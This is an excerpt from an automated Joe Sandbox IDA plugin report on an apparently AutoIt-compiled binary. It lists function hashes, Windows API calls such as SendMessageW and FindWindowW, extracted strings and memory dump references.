                                                                                                                • Opcode ID: 561580de1b89b468937b22390133f2dbf78e7d4510e91bf5e3c638451190ee17
                                                                                                                • Instruction ID: 99776abc7bef069a5697bbf413cf2a736ae455e2be473f4c97927be7caa359c6
                                                                                                                • Opcode Fuzzy Hash: 561580de1b89b468937b22390133f2dbf78e7d4510e91bf5e3c638451190ee17
                                                                                                                • Instruction Fuzzy Hash: E111A034504205ABCB20EFA5EC82FBEB324FF41321F10496AED11972D1DA71AD188791
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00938E73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 372448540-1403004172
                                                                                                                • Opcode ID: 2ef832b6f481aae31ca1bdcc0982f0c2fb8022a92a4cc1c993349901c15d3a97
                                                                                                                • Instruction ID: 0f23723fca9480e71d517d21d4915bd1cffe33fb3092886874a3947b748e1470
                                                                                                                • Opcode Fuzzy Hash: 2ef832b6f481aae31ca1bdcc0982f0c2fb8022a92a4cc1c993349901c15d3a97
                                                                                                                • Instruction Fuzzy Hash: 7501F1B1A05218AB8F24FBA9CC519FE7769FF42320F000A19F871972E2DE315C08CA61
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00938D6B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 372448540-1403004172
                                                                                                                • Opcode ID: 26413f2e6d1f7e538933e0ace1e518514605dc77396a245af41c32871682e508
                                                                                                                • Instruction ID: fb5ea88421b82c82f72c27047b9fb24dd9d4b0471bcd3c23a2951d2d7e21756b
                                                                                                                • Opcode Fuzzy Hash: 26413f2e6d1f7e538933e0ace1e518514605dc77396a245af41c32871682e508
                                                                                                                • Instruction Fuzzy Hash: A701D471B45208ABCF15EBE5C952AFF77A9DF16300F100419B815A32E2DE155E08DA72
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00938DEE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 372448540-1403004172
                                                                                                                • Opcode ID: ec36fd6b1b1d544938b73b40029ebd003e663181a9012325d643df19dee9d550
                                                                                                                • Instruction ID: 55dd94259ee14383ea6a459c0ef5d03d53800fb6aacb1a60c2e6e3b4bd93dda9
                                                                                                                • Opcode Fuzzy Hash: ec36fd6b1b1d544938b73b40029ebd003e663181a9012325d643df19dee9d550
                                                                                                                • Instruction Fuzzy Hash: 5001A271B45209A7DF11EAA9C992AFF77ADDF12300F100419B855A32D2DE255E08DA72
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp
                                                                                                                • String ID: #32770
                                                                                                                • API String ID: 2292705959-463685578
                                                                                                                • Opcode ID: fed9fba65f677f34de57138ddf42ac2c508cf6d9c72ebac4b2ed0e25773869a2
                                                                                                                • Instruction ID: 8738a04238b1b89dfa70f6ae38a3256164f4cb890955cd1db1d58ea8edff4b8f
                                                                                                                • Opcode Fuzzy Hash: fed9fba65f677f34de57138ddf42ac2c508cf6d9c72ebac4b2ed0e25773869a2
                                                                                                                • Instruction Fuzzy Hash: 66E0D832A182282BD720AB99AC49FA7F7ACEF85B70F01006BFD04D7091D9609A45C7E1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0091B314: _memset.LIBCMT ref: 0091B321
                                                                                                                  • Part of subcall function 00900940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0091B2F0,?,?,?,008E100A), ref: 00900945
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,008E100A), ref: 0091B2F4
                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008E100A), ref: 0091B303
                                                                                                                Strings
                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0091B2FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                • API String ID: 3158253471-631824599
                                                                                                                • Opcode ID: 1d578272ebfae6b15b3dd579fc550d0c21d2579d637a6ab7b51b5cb73be2b978
                                                                                                                • Instruction ID: 24ff5ee1054704fd9bfa1734227770b280181b342b9393e55fa7be15614643e0
                                                                                                                • Opcode Fuzzy Hash: 1d578272ebfae6b15b3dd579fc550d0c21d2579d637a6ab7b51b5cb73be2b978
                                                                                                                • Instruction Fuzzy Hash: 2BE065703147458FD720AF68E804786BAE8EF44304F008A2CE8A6C7741EBB4E489CBA1
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00937C82
                                                                                                                  • Part of subcall function 00903358: _doexit.LIBCMT ref: 00903362
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message_doexit
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                • Opcode ID: 7dd69a065ce1493d57fa1ecbefed43178fb3d81a71443e9dc3a51ca4a7605f51
                                                                                                                • Instruction ID: 87a1d112920ab3dcd0816b8ab65de2d27383212120656261ce17c739bc21744a
                                                                                                                • Opcode Fuzzy Hash: 7dd69a065ce1493d57fa1ecbefed43178fb3d81a71443e9dc3a51ca4a7605f51
                                                                                                                • Instruction Fuzzy Hash: D9D02B323C831837D11132EDAC07FCA764C8F41B16F044025FB4C995D34DD1448051E5
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00921775
                                                                                                                  • Part of subcall function 0095BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0092195E,?), ref: 0095BFFE
                                                                                                                  • Part of subcall function 0095BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0095C010
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0092196D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                • String ID: WIN_XPe
                                                                                                                • API String ID: 582185067-3257408948
                                                                                                                • Opcode ID: f075a7f7d03f66fb5aa9c53dae069ab8353ac5b78e0658d1522b0842a88194d6
                                                                                                                • Instruction ID: efea871aeb306ea9f9a2e86bcf58cc7bc481e07a052032a35f46294f6e3227f4
                                                                                                                • Opcode Fuzzy Hash: f075a7f7d03f66fb5aa9c53dae069ab8353ac5b78e0658d1522b0842a88194d6
                                                                                                                • Instruction Fuzzy Hash: 7EF06D70818018DFCB25DFA1E994BECBBFCBBA8301F140099E102A20A4C7744F85EF60
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009659AE
                                                                                                                • PostMessageW.USER32(00000000), ref: 009659B5
                                                                                                                  • Part of subcall function 00945244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009452BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: c3eb7fa74efa32cc7be5992f67602140f79cb495951915cf564e146f984212e0
                                                                                                                • Instruction ID: 4050f2b7c960c7d103c23ce99dc7a83677d8ed1bb563b4680351476615f51d69
                                                                                                                • Opcode Fuzzy Hash: c3eb7fa74efa32cc7be5992f67602140f79cb495951915cf564e146f984212e0
                                                                                                                • Instruction Fuzzy Hash: D3D0C9313947117BE664AB70AC1BF976614AB46B54F01182AB256AA1D1C9E0AC00D654
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0096596E
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00965981
                                                                                                                  • Part of subcall function 00945244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009452BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 80bab0357def5dcaee16b5e54befab3a47009a08a43039144f9fdd88b9e0fd53
                                                                                                                • Instruction ID: ed2635e851d470e3424468ef84ca1a0269ab5535e746bc986419443ab63fb680
                                                                                                                • Opcode Fuzzy Hash: 80bab0357def5dcaee16b5e54befab3a47009a08a43039144f9fdd88b9e0fd53
                                                                                                                • Instruction Fuzzy Hash: DAD0C931398711B7E664AB70AC1BFA76A14AB41B54F01182AB25AAA1D1C9E09C00D654